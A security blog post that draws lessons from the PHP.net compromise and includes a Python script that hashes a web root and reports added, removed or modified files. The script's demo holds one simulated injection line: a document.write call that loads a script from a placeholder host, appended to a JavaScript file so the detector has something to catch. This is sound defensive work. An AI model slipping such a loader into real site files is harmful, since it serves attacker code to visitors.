PHP.net Compromise - Tracking Changes

Most everyone within the information security industry is familiar with last week’s compromise of PHP.net, which caused the site to serve malicious JavaScript for some time.

I won’t rehash the details of the compromise (follow the link for that), but the important piece for me was this:


The compromise was discovered Thursday morning by Google’s safe browsing service, which helps the Chrome, Firefox, and Safari browsers automatically block sites that serve drive-by exploits. Traces of the malicious JavaScript code served to some php.net visitors were captured and posted to Hacker News here and, in the form of a pcap file, to a Barracuda Networks blog post here. The attacks started Tuesday and lasted through Thursday morning, PHP officials wrote in a statement posted late that evening.

While it is fantastic to successfully block attacks, everyone gets compromised at some point, which is why I believe it is critical to develop the capability to rapidly detect, respond to, and contain those compromises. Finding out you’re compromised from a search company (Google) and third parties is not ideal.

I like to learn from incidents, and one lesson from this one that would have helped detect the compromise quickly is to track and review all changes to website files and database entries.
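As an added example of the file-change tracking suggested above (this is not code from the original post, nor PHP.net's own tooling), the script below records a SHA-256 for every regular file under a web root, stores that as a JSON baseline, and on later runs reports what was added, removed, or modified. It hashes contents rather than trusting modification times, since whoever can write a file can also reset its timestamp, and it skips symlinks so a planted link cannot pull a file from outside the web root into the report. The web root, file names and the simulated tampering in `demo()` are constructed for the example; the `argparse` interface is my own choice. Tracking database rows would need a separate mechanism (audit triggers or row hashing) that this script does not cover.

```python
"""Baseline-and-diff file integrity check for a web root.

Added example (not code from the original post or from PHP.net): it records a
SHA-256 for every regular file under a directory, saves that as a JSON
baseline, and on the next run reports files that were added, removed, or whose
contents changed. Content hashes are used rather than mtimes because an
attacker who can write the file can also reset its timestamp.
"""
import argparse
import hashlib
import json
import sys
import tempfile
from pathlib import Path

CHUNK = 64 * 1024


def hash_file(path: Path) -> str:
    """SHA-256 of a file's contents, read in chunks so large files are fine."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root: Path) -> dict[str, str]:
    """Map every regular file under root (relative POSIX path) to its hash.

    Symlinks are skipped: hashing their target would silently follow a link an
    attacker planted to point outside the web root.
    """
    files = {}
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        files[path.relative_to(root).as_posix()] = hash_file(path)
    return files


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Classify the differences between two snapshots."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def check(root: Path, baseline_file: Path) -> dict[str, list[str]]:
    """Diff the live tree against a stored baseline."""
    baseline = json.loads(baseline_file.read_text())
    return compare(baseline, snapshot(root))


def demo() -> dict[str, list[str]]:
    """Constructed web root: baseline it, simulate tampering, report the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "htdocs"
        (root / "js").mkdir(parents=True)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "robots.txt").write_text("User-agent: *\n")
        (root / "js" / "app.js").write_text("console.log('app');\n")

        # In real use the baseline lives off-box or on read-only storage so the
        # attacker who owns the web root cannot re-baseline around the check.
        baseline_file = Path(tmp) / "baseline.json"
        baseline_file.write_text(json.dumps(snapshot(root), indent=2, sort_keys=True))

        # Simulated compromise (constructed for the demo): a script loader is
        # appended to an existing JS file, a new file is dropped, one is removed.
        with (root / "js" / "app.js").open("a") as fh:
            fh.write("document.write('<script src=\"//example.invalid/x.js\"></script>');\n")
        (root / "js" / "new.js").write_text("// dropped by attacker\n")
        (root / "robots.txt").unlink()

        return check(root, baseline_file)


def main(argv: list[str]) -> int:
    ap = argparse.ArgumentParser(description="web root integrity check")
    ap.add_argument("mode", choices=["baseline", "check", "demo"])
    ap.add_argument("root", nargs="?", type=Path)
    ap.add_argument("baseline_file", nargs="?", type=Path)
    args = ap.parse_args(argv)
    if args.mode == "demo":
        print(json.dumps(demo(), indent=2))
        return 0
    if args.root is None or args.baseline_file is None:
        ap.error("root and baseline_file are required")
    if args.mode == "baseline":
        args.baseline_file.write_text(json.dumps(snapshot(args.root), indent=2, sort_keys=True))
        return 0
    report = check(args.root, args.baseline_file)
    print(json.dumps(report, indent=2))
    return 1 if any(report.values()) else 0  # non-zero exit is the alert


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Take the baseline as the last step of each deployment (`baseline /var/www/html baseline.json`), keep the JSON somewhere the web server's user cannot write, and run `check` from cron or your monitoring agent so that a non-zero exit pages someone. Every legitimate deploy must be followed by a fresh baseline, otherwise the alerts become noise and get ignored, which is exactly the failure mode that lets an injected script sit on a site for days.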